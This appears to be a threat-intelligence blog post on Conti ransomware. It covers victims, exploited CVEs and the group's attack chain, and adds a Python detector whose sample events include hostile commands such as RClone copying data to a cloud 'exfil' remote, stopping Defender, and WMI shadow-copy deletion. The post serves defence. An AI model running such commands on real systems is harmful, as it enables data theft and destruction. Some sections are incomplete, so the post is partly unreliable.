Is Conti Ransomware on a roll?
Posted on 7th Jul, 2021 | By Priya Ravindran
The Conti group is associated with three vulnerabilities. Had these been given precedence in CVE patching priorities, the series of Conti attacks could have been avoided.
CVE-2020-0796 and CVE-2018-13379 were warned against in CSW’s Ransomware Reports published in February and May 2021.
Let us take a look at the different recent incidents in which the Conti group has been involved.
The Ireland HSE incident shook the health industry, closely following the oil industry's Colonial Pipeline attack; IT systems had to be shut down, leading to chaos in the delivery of regular health services. Exagrid paid a $2.6M ransom in the form of 50.75 Bitcoins for a decryption tool and to prevent its data from being leaked. In the last week of June 2021, Conti claimed responsibility for an attack on the city of Tulsa in early May, leaking over 18,000 city files on the Dark Web. Three Canadian companies - an Internet provider and an engineering firm, both from Ontario, and a Quebec-based insurance broker - have also fallen victim to the group, according to Conti's website.
Conti - A Cheat Sheet
We analyzed three CVEs being exploited by the Conti group - CVE-2020-0796,
It is widely believed that Russia’s Wizard Spider Advanced Persistent Threat (APT) group uses the Conti ransomware in its attacks.
A Shodan analysis of CVE-2020-0796 brings up over 75,000 deployments, concentrated mainly in Taiwan and Japan. Windows 10 Home is the most widely used OS susceptible to CVE-2020-0796 exploits.
There are over 60,000 deployments of FortiOS worldwide, according to Shodan, with the US ranking first on the list.
Looking at multiple attacks involving Conti ransomware, we have understood the following to be their overall attack methodology.
Scout for weak entry points in devices and infect them with an IcedID payload, followed by BazarLoader malware.
Use batch files to disable security tools through the backdoor thus created.
Deploy a Cobalt Strike beacon to gather confidential details.
Scan to identify open ports.
Utilize a combination of Remote Desktop Protocol (RDP), PsExec and Server Message Block (SMB) to worm its way laterally within the network.
Exfiltrate data to cloud storage through command-line tools such as RClone.
Stealthily deploy Cobalt Strike beacons to attached devices.
Execute malicious code in memory across all active systems.
Delete shadow copies using Windows Management Instrumentation (WMI).
The ransomware continues ploughing through the network until detected.
Coincidentally, on June 1, 2021, the FBI sent out a warning that New Zealand-based Mega cloud storage was being used by ransomware groups such as Conti for data storage.
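As an added example (not code from CSW's post), the following Python detector scans constructed process-creation events for the later stages of the chain above: batch files stopping security tools, PsExec lateral movement, RClone copying data to a cloud remote, and shadow-copy deletion via WMI. The stage names, sample events and the two-stage escalation threshold are assumptions made for this illustration.

```python
import re

# Constructed sample process-creation events: (host, parent process, command line).
# They are illustrative, not events from any real Conti intrusion.
SAMPLE_EVENTS = [
    ("WS01", "explorer.exe", r"cmd.exe /c C:\Users\a\AppData\Local\Temp\disable_av.bat"),
    ("WS01", "cmd.exe", 'net stop "Windows Defender Antivirus Service"'),
    ("WS01", "cmd.exe", r"rclone.exe copy D:\Finance mega:exfil --transfers 32"),
    ("SRV02", "services.exe", r"C:\Windows\PSEXESVC.exe"),
    ("SRV02", "cmd.exe", "wmic shadowcopy delete"),
    ("SRV03", "cmd.exe", "vssadmin list shadows"),  # benign admin check, must not match
]

# One regex per stage of the chain described above; stage names are hypothetical labels.
# A lone .bat hit is noisy on its own, which is why hosts are scored on distinct stages.
STAGE_PATTERNS = [
    ("disable_security_tools", re.compile(r'\.bat\b|net\s+stop\s+"?windows defender', re.I)),
    ("lateral_movement", re.compile(r"psexesvc\.exe|psexec(64)?\.exe", re.I)),
    ("exfiltration", re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I)),
    # wmic shadowcopy delete, or the Win32_ShadowCopy WMI class driven from PowerShell
    ("shadow_copy_deletion", re.compile(r"wmic\s+shadowcopy\s+delete|win32_shadowcopy", re.I)),
]


def classify(cmdline):
    """Return the first stage whose pattern matches the command line, or None."""
    for stage, pattern in STAGE_PATTERNS:
        if pattern.search(cmdline):
            return stage
    return None


def stages_per_host(events):
    """Map host -> distinct matched stages, in the order they were first observed."""
    seen = {}
    for host, _parent, cmdline in events:
        stage = classify(cmdline)
        if stage is not None and stage not in seen.setdefault(host, []):
            seen[host].append(stage)
    return seen


def hosts_to_escalate(events, min_stages=2):
    """Hosts showing at least min_stages distinct stages: one hit may be admin noise,
    two or more on one host reproduce the post-compromise sequence and need a ticket."""
    return sorted(h for h, s in stages_per_host(events).items() if len(s) >= min_stages)


if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
    print("escalate:", hosts_to_escalate(SAMPLE_EVENTS))
```

On real telemetry the events would come from Sysmon event ID 1 or Windows security event 4688 rather than the inline list, and the patterns would be tuned against the environment's own admin tooling.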
MITRE ATT&CK Mapping
Indicators of Compromise
A thorough ransomware analysis is the need of the hour
The vulnerabilities CVE-2020-0796 and CVE-2018-13379 are currently trending, although they were discovered more than a year ago. This is a clear indication of the importance of patching older vulnerabilities and not just the newly discovered high-severity ones. In fact, as highlighted in CSW's Ransomware Report, vulnerabilities discovered in 2020 and earlier accounted for 97% of the total vulnerability count (260) as of March 2021.
The recent series of attacks shows how attackers may bide their time, waiting for bigger opportunities that lead to crippling disruption. Adopting a risk-based approach and prioritizing critical vulnerabilities based on threat context is the need of the hour.